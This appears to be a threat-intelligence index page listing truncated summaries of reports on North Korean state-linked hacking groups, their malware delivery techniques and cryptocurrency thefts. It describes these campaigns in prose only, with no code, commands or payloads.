627 reports
AhnLab reports that the North Korea-linked Kimsuky group abused Chrome Remote Desktop to maintain GUI control of infected Windows systems after deploying its AppleSeed backdoor. The observed chain used WSF or JavaScript malware that decoded AppleSeed with…
360 Advanced Threat Research Institute attributes a campaign using fake ComcastVNC software to APT-C-26/Lazarus with medium confidence, based on alignment with previously reported Lazarus TightVNC and sRDI/BlindingCan tradecraft. The initial archive/ISO d…
ESTsecurity’s ESRC reports a Kimsuky campaign distributing malware disguised as a legitimate “Mail Online Security” installer, assessed as a variant of activity previously warned about by South Korea’s NCSC/KISA. The lure used an ISO containing setup.exe …
The Korean source analyzes a Kimsuky-linked LNK malware sample named “Pipelines Profile,” describing the actor’s use of link-file delivery as macro-based Office attacks became less effective. The oversized LNK launches hidden PowerShell, extracts an embed…
Phylum observed a coordinated npm supply-chain campaign in which malicious packages were published in pairs that had to run sequentially on the same host. The first package used a preinstall hook to install sync-request, contact an attacker server, and wr…
Considering that the words used in the malware and the executed script code are similar to that of previously analyzed codes, it is suspected that the same threat group (Kimsuky) is also the creator of this malware. Both the script present in the above UR…
The SBS segment explains how DPRK cyber theft helps fund weapons and missile programs, citing US and South Korean statements that cyber operations provide a major share of regime revenue. It discusses named North Korean hackers charged by the US, cryptocu…
Kimsuky is the most common threat group, followed by Lazarus Group and APT37. South Korea and the United States are the most common targets, but North Korean threat actors have a global reach, targeting entities in at least 29 countries. Despite its centr…
North Korean hackers are described as financially motivated operators who moved from high-profile disruption, including Sony and WannaCry, into large-scale theft from banks and cryptocurrency businesses. The WSJ transcript cites Chainalysis estimates that…
TRM Labs frames North Korean cryptocurrency theft as a growing revenue stream that has expanded as sanctions, border closures, and weakened traditional income channels increased pressure on the regime. The excerpt highlights attacks on cryptocurrency busi…
Elastic analyzed a REF9134 intrusion at a prominent Japanese cryptocurrency exchange where an adversary used JOKERSPY components on macOS systems. The activity involved the self-signed Swift binary xcc, which checked permissions such as Full Disk Access, …
NSHC ThreatRecon’s April 2023 monthly intelligence report identifies SectorA activity as the most prominent threat-actor grouping in the period, with five SectorA clusters observed across South Korea and other regions. The DPRK-relevant section describes …
ASEC attributed a May 2023 campaign to RedEyes/APT37, also known as ScarCruft/Reaper, targeting individuals such as North Korean defectors, human-rights activists, and university professors. The intrusion used spear-phishing attachments that paired a norm…
While the Kimsuky group often used document files for malware distribution, there have been many recent cases where CHM files were used in distribution. Recently, there has been an increase in malware distribution targeting particular users using personal…
The team has researched various potential causes, the most probable of which are virus targeting on local users devices, infrastructure breach, malware code injection, or a man-in-the-middle attack. We've engaged with the leading Crypto Investigators - Ch…